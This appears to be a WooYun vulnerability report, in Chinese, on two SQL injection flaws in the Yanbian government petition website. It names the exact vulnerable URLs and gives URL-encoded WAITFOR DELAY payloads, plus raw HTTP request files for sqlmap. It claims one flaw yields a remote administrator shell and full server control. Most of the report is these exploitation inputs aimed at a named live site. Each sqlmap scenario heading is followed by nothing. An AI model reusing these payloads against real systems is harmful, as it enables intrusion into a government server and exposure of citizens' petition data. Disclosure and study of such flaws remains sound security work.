WooYun.org

延边信访网站存在两处sql注入漏洞：
http://www.ybzwsxf.gov.cn/Account/Register1/?UID=
http://www.ybzwsxf.gov.cn/AllList/Details/?Code=
。其中 http://www.ybzwsxf.gov.cn/Account/Register1/?UID=
可以被利用开启具有系统管理员权限的远程shell,进而控制整个服务器系统；http://www.ybzwsxf.gov.cn/AllList/Details/?Code=
可以探测到操作系统、web服务器、数据库等信息。
在延边信访网站，使用如下url：
http://www.ybzwsxf.gov.cn/Account/Register1/?UID=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+；和 http://www.ybzwsxf.gov.cn/AllList/Details/?Code=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+可以触发sql注入漏洞。其中 http://www.ybzwsxf.gov.cn/Account/Register1/?UID=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+可以被利用开启一个远程shell,进而执行系统管理员命令，控制整个服务器系统；而http://www.ybzwsxf.gov.cn/AllList/Details/?Code=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+
可以探测到操作系统、web服务器、数据库等信息。
1)http://www.ybzwsxf.gov.cn/Account/Register1/?UID=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+漏洞利用：
yb_uid_sql.txt内容：
GET http://www.ybzwsxf.gov.cn/Account/Register1/?UID=%27+%2B+ltrim%28%27%27%29+%2B+%27 HTTP/1.1
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ybzwsxf.gov.cn/
Host: www.ybzwsxf.gov.cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
Proxy-Connection: Keep-Alive
使用sqlmap sql注入攻击场景：

2)http://www.ybzwsxf.gov.cn/AllList/Details/?Code=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+漏洞利用：
yb_code_sql.txt内容：
GET http://www.ybzwsxf.gov.cn/AllList/Details/?Code=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+ HTTP/1.1
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ybzwsxf.gov.cn/AllList/Index/
Host: www.ybzwsxf.gov.cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
Proxy-Connection: Keep-Alive
使用sqlmap sql注入攻击场景：